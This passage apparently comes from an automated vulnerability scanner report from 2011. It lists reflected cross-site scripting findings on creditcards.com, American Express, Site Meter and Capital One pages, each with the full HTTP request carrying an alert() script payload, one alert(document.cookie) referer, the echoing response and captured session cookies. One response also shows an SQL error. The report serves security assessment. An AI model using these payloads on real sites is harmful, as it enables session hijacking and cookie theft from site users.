<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...
prop5=""
s.prop6=""
s.prop7=""
s.prop8=""
s.prop12=s.c_r('s_vi');
s.prop16="1"
/* Conversion Variables */
s.campaign=""
s.state=""
s.zip=""
s.events="purchase,event2"
s.products="17;221055611a930";alert(1)//b128c8fd28;1;0"
s.purchaseID="1012011061706591170368870"
s.eVar1=""
s.eVar2=""
s.eVar3=""
s.eVar4=""
s.eVar5=""
s.eVar6=""
s.eVar7=""
s.eVar8=""
s.eVar25="17"
s.eVar26="1"
s.eVar18=s.c_r('s_vi');

...[SNIP]...

3.19. http://www.creditcards.com/oc/ [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc/

Issue detail

The value of the pid request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a7662'><script>alert(1)</script>5947a69cf4f was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /oc/?pid=22105561a7662'><script>alert(1)</script>5947a69cf4f&pg=17&pgpos=1 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/business.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308311437978272; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; SSBAL=node.web1; s_cc=true; CCsCookieimp=1308311932; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311937698%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253DTYPE%25253Abusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/oc/%25253Fpid%25253D22105561%252526pg%25253D17%252526pgpos%25253D1%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:10 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 3829
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 11:59:10 GMT; path=/

<center><span class='error'>SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '><script>alert(1)</script>
...[SNIP]...
<IMG SRC='http://www.creditcards.com/xtrack.php?pid=22105561a7662'><script>alert(1)</script>5947a69cf4f&pg=17&pgpos=1' border=0 width=1 height=1>
...[SNIP]...

3.20. http://www.creditcards.com/points-rewards.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/points-rewards.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 72445'><script>alert(1)</script>5f52304f04f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /points-rewards.php?72445'><script>alert(1)</script>5f52304f04f=1 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308311437978272; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; SSBAL=node.web1; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D; CCsCookieimp=1308311486

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:51 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 44230

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<title>Points Rewards Credit Cards - CreditCards.com</title>
<meta name="key
...[SNIP]...
<IMG SRC='http://www.creditcards.com/xtrack.php?72445'><script>alert(1)</script>5f52304f04f=1' border=0 width=1 height=1>
...[SNIP]...

3.21. http://www262.americanexpress.com/landing-page/business-cards/mclp/scashplum/pm0002/42732 [BUID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www262.americanexpress.com
Path:	/landing-page/business-cards/mclp/scashplum/pm0002/42732

Issue detail

The value of the BUID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7ca2"-alert(1)-"ab9427c0d98 was submitted in the BUID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /landing-page/business-cards/mclp/scashplum/pm0002/42732?PID=1&BUID=SBSf7ca2"-alert(1)-"ab9427c0d98&PSKU=SCB&CRTV=SCBPML&EAID=EhraRx8K%2FBE-figIFch8YIne3Ub0J2Tk5g HTTP/1.1
Host: www262.americanexpress.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22035646&pg=17&pgpos=6
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SaneID=173.193.214.243-1308311996862975

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:00:29 GMT
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 22161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<he
...[SNIP]...
aet) var aet = {}; aet.data = {"page" : {"type" : "DLP", "name" : "pm0002", "cheetahmail" : {"aid" : "", "n" : "", "fsub" : "", "OA_RECENT_SRC" : "", "OA_PRODID" : "" },"querystring" : "PID=1&BUID=SBSf7ca2"-alert(1)-"ab9427c0d98&PSKU=SCB&CRTV=SCBPML&EAID=EhraRx8K%2FBE-figIFch8YIne3Ub0J2Tk5g", "estara" : "as00.estara.com/fs/lr.php?onload=1&accountid=200106285055", "doubleclick" : "https://fls.doubleclick.net/activityi;src=1297
...[SNIP]...

3.22. http://www262.americanexpress.com/landing-page/business-cards/mclp/scashplum/pm0002/42732 [CRTV parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www262.americanexpress.com
Path:	/landing-page/business-cards/mclp/scashplum/pm0002/42732

Issue detail

The value of the CRTV request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a94eb"-alert(1)-"313a6721a4e was submitted in the CRTV parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /landing-page/business-cards/mclp/scashplum/pm0002/42732?PID=1&BUID=SBS&PSKU=SCB&CRTV=SCBPMLa94eb"-alert(1)-"313a6721a4e&EAID=EhraRx8K%2FBE-figIFch8YIne3Ub0J2Tk5g HTTP/1.1
Host: www262.americanexpress.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22035646&pg=17&pgpos=6
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SaneID=173.193.214.243-1308311996862975

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:01:01 GMT
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 22161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<he
...[SNIP]...
et.data = {"page" : {"type" : "DLP", "name" : "pm0002", "cheetahmail" : {"aid" : "", "n" : "", "fsub" : "", "OA_RECENT_SRC" : "", "OA_PRODID" : "" },"querystring" : "PID=1&BUID=SBS&PSKU=SCB&CRTV=SCBPMLa94eb"-alert(1)-"313a6721a4e&EAID=EhraRx8K%2FBE-figIFch8YIne3Ub0J2Tk5g", "estara" : "as00.estara.com/fs/lr.php?onload=1&accountid=200106285055", "doubleclick" : "https://fls.doubleclick.net/activityi;src=1297440;type=singl842;cat
...[SNIP]...

3.23. http://www262.americanexpress.com/landing-page/business-cards/mclp/scashplum/pm0002/42732 [EAID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www262.americanexpress.com
Path:	/landing-page/business-cards/mclp/scashplum/pm0002/42732

Issue detail

The value of the EAID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8a9c0"-alert(1)-"d44ba865ee5 was submitted in the EAID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /landing-page/business-cards/mclp/scashplum/pm0002/42732?PID=1&BUID=SBS&PSKU=SCB&CRTV=SCBPML&EAID=EhraRx8K%2FBE-figIFch8YIne3Ub0J2Tk5g8a9c0"-alert(1)-"d44ba865ee5 HTTP/1.1
Host: www262.americanexpress.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22035646&pg=17&pgpos=6
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SaneID=173.193.214.243-1308311996862975

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:01:14 GMT
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 22161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<he
...[SNIP]...
" : "pm0002", "cheetahmail" : {"aid" : "", "n" : "", "fsub" : "", "OA_RECENT_SRC" : "", "OA_PRODID" : "" },"querystring" : "PID=1&BUID=SBS&PSKU=SCB&CRTV=SCBPML&EAID=EhraRx8K%2FBE-figIFch8YIne3Ub0J2Tk5g8a9c0"-alert(1)-"d44ba865ee5", "estara" : "as00.estara.com/fs/lr.php?onload=1&accountid=200106285055", "doubleclick" : "https://fls.doubleclick.net/activityi;src=1297440;type=singl842;cat=singl685;ord=1;num=" } };
</script>
...[SNIP]...

3.24. http://www262.americanexpress.com/landing-page/business-cards/mclp/scashplum/pm0002/42732 [PID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www262.americanexpress.com
Path:	/landing-page/business-cards/mclp/scashplum/pm0002/42732

Issue detail

The value of the PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a69c8"-alert(1)-"36ea2529e7b was submitted in the PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /landing-page/business-cards/mclp/scashplum/pm0002/42732?PID=1a69c8"-alert(1)-"36ea2529e7b&BUID=SBS&PSKU=SCB&CRTV=SCBPML&EAID=EhraRx8K%2FBE-figIFch8YIne3Ub0J2Tk5g HTTP/1.1
Host: www262.americanexpress.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22035646&pg=17&pgpos=6
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SaneID=173.193.214.243-1308311996862975

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:00:17 GMT
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 22161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<he
...[SNIP]...

if(!!!aet) var aet = {}; aet.data = {"page" : {"type" : "DLP", "name" : "pm0002", "cheetahmail" : {"aid" : "", "n" : "", "fsub" : "", "OA_RECENT_SRC" : "", "OA_PRODID" : "" },"querystring" : "PID=1a69c8"-alert(1)-"36ea2529e7b&BUID=SBS&PSKU=SCB&CRTV=SCBPML&EAID=EhraRx8K%2FBE-figIFch8YIne3Ub0J2Tk5g", "estara" : "as00.estara.com/fs/lr.php?onload=1&accountid=200106285055", "doubleclick" : "https://fls.doubleclick.net/activityi
...[SNIP]...

3.25. http://www262.americanexpress.com/landing-page/business-cards/mclp/scashplum/pm0002/42732 [PSKU parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www262.americanexpress.com
Path:	/landing-page/business-cards/mclp/scashplum/pm0002/42732

Issue detail

The value of the PSKU request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c97db"-alert(1)-"1e180ee12fb was submitted in the PSKU parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /landing-page/business-cards/mclp/scashplum/pm0002/42732?PID=1&BUID=SBS&PSKU=SCBc97db"-alert(1)-"1e180ee12fb&CRTV=SCBPML&EAID=EhraRx8K%2FBE-figIFch8YIne3Ub0J2Tk5g HTTP/1.1
Host: www262.americanexpress.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22035646&pg=17&pgpos=6
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SaneID=173.193.214.243-1308311996862975

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:00:43 GMT
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 22161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<he
...[SNIP]...
aet = {}; aet.data = {"page" : {"type" : "DLP", "name" : "pm0002", "cheetahmail" : {"aid" : "", "n" : "", "fsub" : "", "OA_RECENT_SRC" : "", "OA_PRODID" : "" },"querystring" : "PID=1&BUID=SBS&PSKU=SCBc97db"-alert(1)-"1e180ee12fb&CRTV=SCBPML&EAID=EhraRx8K%2FBE-figIFch8YIne3Ub0J2Tk5g", "estara" : "as00.estara.com/fs/lr.php?onload=1&accountid=200106285055", "doubleclick" : "https://fls.doubleclick.net/activityi;src=1297440;type=
...[SNIP]...

3.26. http://www262.americanexpress.com/landing-page/business-cards/mclp/scashplum/pm0002/42732 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www262.americanexpress.com
Path:	/landing-page/business-cards/mclp/scashplum/pm0002/42732

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31b53"-alert(1)-"d28366bbd68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /landing-page/business-cards/mclp/scashplum/pm0002/42732?PID=1&BUID=SBS&PSKU=SCB&CRTV=SCBPML&EAID=EhraRx8K%2FBE-figIFch8YIne3Ub0J2Tk5g&31b53"-alert(1)-"d28366bbd68=1 HTTP/1.1
Host: www262.americanexpress.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22035646&pg=17&pgpos=6
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SaneID=173.193.214.243-1308311996862975

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:01:36 GMT
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 22164

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<he
...[SNIP]...
: "pm0002", "cheetahmail" : {"aid" : "", "n" : "", "fsub" : "", "OA_RECENT_SRC" : "", "OA_PRODID" : "" },"querystring" : "PID=1&BUID=SBS&PSKU=SCB&CRTV=SCBPML&EAID=EhraRx8K%2FBE-figIFch8YIne3Ub0J2Tk5g&31b53"-alert(1)-"d28366bbd68=1", "estara" : "as00.estara.com/fs/lr.php?onload=1&accountid=200106285055", "doubleclick" : "https://fls.doubleclick.net/activityi;src=1297440;type=singl842;cat=singl685;ord=1;num=" } };
</script>
...[SNIP]...

3.27. http://s46.sitemeter.com/js/counter.asp [IP cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s46.sitemeter.com
Path:	/js/counter.asp

Issue detail

The value of the IP cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70f2b"%3balert(1)//04af98ca68 was submitted in the IP cookie. This input was echoed as 70f2b";alert(1)//04af98ca68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /js/counter.asp?site=s46cccgblog HTTP/1.1
Host: s46.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://blogs.creditcards.com/fine-print/?3cf6d%22-alert(document.cookie)-%22cf7270b0551=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IP=173%2E193%2E214%2E24370f2b"%3balert(1)//04af98ca68

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 17 Jun 2011 12:11:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7291
Content-Type: application/x-javascript
Expires: Fri, 17 Jun 2011 12:21:21 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServerName;
       SiteMeter.SecurityCode = sSecurityCode;
       SiteMeter.IP = "173.193.214.24370f2b";alert(1)//04af98ca68";
       SiteMeter.trackingImage = new Image();
       SiteMeter.dgOutlinkImage = new Image();

       if (typeof(g_sLastCodeName) != 'undefined')
           if (g_sLastCodeName == sCodeName)
               return;

       SiteMete
...[SNIP]...

3.28. http://s46.sitemeter.com/js/counter.js [IP cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s46.sitemeter.com
Path:	/js/counter.js

Issue detail

The value of the IP cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a03b3"%3balert(1)//8ea5d3eaa40 was submitted in the IP cookie. This input was echoed as a03b3";alert(1)//8ea5d3eaa40 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /js/counter.js?site=s46cccgblog HTTP/1.1
Host: s46.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://blogs.creditcards.com/fine-print/?3cf6d%22-alert(document.cookie)-%22cf7270b0551=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IP=173%2E193%2E214%2E243a03b3"%3balert(1)//8ea5d3eaa40

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Fri, 17 Jun 2011 12:11:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7292
Content-Type: application/x-javascript
Expires: Fri, 17 Jun 2011 12:21:25 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServerName;
       SiteMeter.SecurityCode = sSecurityCode;
       SiteMeter.IP = "173.193.214.243a03b3";alert(1)//8ea5d3eaa40";
       SiteMeter.trackingImage = new Image();
       SiteMeter.dgOutlinkImage = new Image();

       if (typeof(g_sLastCodeName) != 'undefined')
           if (g_sLastCodeName == sCodeName)
               return;

       SiteMete
...[SNIP]...

3.29. http://www.capitalone.com/smallbusiness/cards/venture-for-business/ [v1st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/smallbusiness/cards/venture-for-business/

Issue detail

The value of the v1st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e34f0'-alert(1)-'3ba5a5acf1a was submitted in the v1st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251 HTTP/1.1
Host: www.capitalone.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22105561&pg=17&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4e34f0'-alert(1)-'3ba5a5acf1a; itc=CAPITALONE11NZZZintmktgD4; caponesn=d526e113S04syM9LTU6OK7YyMrNScnRzszIyMLAwMDEw0i1JNzDUNTIwNDQwM7BUso4zNDU1sAQA; BIGipServerpl_capitalone.com_80=828974346.29215.0000; external_id=GAN_ZZ10700001_USCGAN_j26689465k112308_631528059; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; smartTracking=

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:24 GMT
Server: Apache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: WWWJSESSIONID=qkZxN7BcpXhPk0gtJ1DXnng9KSl3HQQTgYMdyyJQW5Y95KMYgCkv!1127808106!103720762; domain=.capitalone.com; path=/; secure
Set-Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; domain=.capitalone.com; expires=Saturday, 18-Jun-2011 11:59:24 GMT; path=/
Set-Cookie: caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; domain=.capitalone.com; expires=Monday, 14-Jun-2021 11:59:24 GMT; path=/
Set-Cookie: SmallBusiness=6b4455bbcy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCqcYaqca0oSC3KTM1LToUr8%2FF38gXSmcGpxcWZ%2BXnO%2BaVAM4xAwp55KGKGNQA%3D; domain=.capitalone.com; expires=Saturday, 18-Jun-2011 11:59:24 GMT; path=/
Set-Cookie: external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; domain=.capitalone.com; expires=Saturday, 18-Jun-2011 11:59:24 GMT; path=/
Set-Cookie: portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D; domain=.capitalone.com; expires=Saturday, 18-Jun-2011 11:59:24 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html; charset=UTF-8
Content-Length: 39050

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US"><head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"/><meta http-e
...[SNIP]...
'TestCell','02'); //All pages
lpAddVars('session','Behavior',''); //All pages
lpAddVars('session','InsertRule',''); //All pages
lpAddVars('visitor','VisitorID','FB8DCF93533EFDA4e34f0'-alert(1)-'3ba5a5acf1a'); //All pages
lpAddVars('page','Section','Venture for Business'); //All pages
lpAddVars('session','pageName',''); //All pages
lpAddVars('session','LPgroup',''); //All pages

...[SNIP]...

4. Flash cross-domain policy previous next
There are 25 instances of this issue:

http://ad.doubleclick.net/crossdomain.xml
